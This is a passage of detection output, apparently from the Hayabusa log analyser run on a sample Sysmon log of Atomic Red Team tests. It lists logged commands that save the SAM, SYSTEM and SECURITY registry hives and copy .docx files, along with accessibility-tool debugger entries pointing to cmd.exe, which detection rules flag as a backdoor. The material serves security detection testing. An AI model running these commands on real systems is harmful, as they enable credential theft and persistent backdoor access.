Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\Security security.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\System system.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM 
sam.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SAM sam.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b 
/s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .docx : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor 
Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 
